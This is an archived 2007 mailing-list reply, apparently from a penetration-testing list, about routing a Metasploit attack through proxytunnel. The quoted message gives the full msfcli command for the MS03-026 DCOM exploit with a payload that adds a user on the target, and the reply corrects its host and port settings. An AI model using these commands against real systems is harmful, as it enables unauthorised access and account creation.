Re: Running metasploit thru proxytunnel

From: Alexander Bondarenko (al.bondarenko@gmail.com)
Date: Wed Oct 10 2007 - 10:46:24 EDT

• Next message: Thor (Hammer of God): "RE: Password Crack an OU in Windows 2003"
• Previous message: ben.dexter@act.gov.au: "Re: Re: Password Crack an OU in Windows 2003"
• In reply to: James Kelly: "Running metasploit thru proxytunnel"
• Next in thread: jond: "Re: Running metasploit thru proxytunnel"
• Reply: jond: "Re: Running metasploit thru proxytunnel"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi,

why do you use RHOST=localhost ? It should be proxy IP and RPORT should be
proxy port not 235.

Regards,
Alex

On Saturday 06 October 2007 15:18, James Kelly wrote:
> Folks
>
> I've been banging my head into my keyboard for two days now, not
> getting anywhere and I was hoping one of
> you could smack me upside the head and tell me what I've screwed up.
>
> Problem:
>
> attacker IP: 1.2.3.4
> proxy IP: 2.3.4.5
> proxy port 6666
> victim: 3.4.5.6
> victim port: 7777
>
> Proxytunnel setup:
>
> proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777
> **now the above config works fine with rdesktop when I use:
>
> proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
> and I do
> rdesktop localhost:666 <--I can ts to the victim box just fine.
>
> When I try to do metasploit over proxytunnel I do
> config:
> Metasploit framework2
> exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
> Shell" ;-) goes to RPORT 135
> payload: win32_adduser
>
> first the tunnel:
> proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
> now metasploit
> msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
> RPORT=235 PASS=password USER=blah
>
> When I hit the exploit I see "Sending Request..." then nothing.
>
> I can rdesktop via proxytunnel to the victim successfully but cannot
> login with username blah password password.
>
> Assume the victim is vulnerable to dcom.
>
> Now can anything obvious that I've screwed up?
>
>
> ________________________________________________________________________
> ____
> 01001001 01100110 01111001 01101111 01110101 01100011 01100001
> 01101110
> 01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011
> 01111001 01101111 01110101 01101110 01100101 01100101 01100100 01110100
> 01101111 01100111 01100101 01110100 01100001 01101100 01101001
> 01100110
> 01100101 0010111
> ________________________________________________________________________
> ____
>
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: Thor (Hammer of God): "RE: Password Crack an OU in Windows 2003"
• Previous message: ben.dexter@act.gov.au: "Re: Re: Password Crack an OU in Windows 2003"
• In reply to: James Kelly: "Running metasploit thru proxytunnel"
• Next in thread: jond: "Re: Running metasploit thru proxytunnel"
• Reply: jond: "Re: Running metasploit thru proxytunnel"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT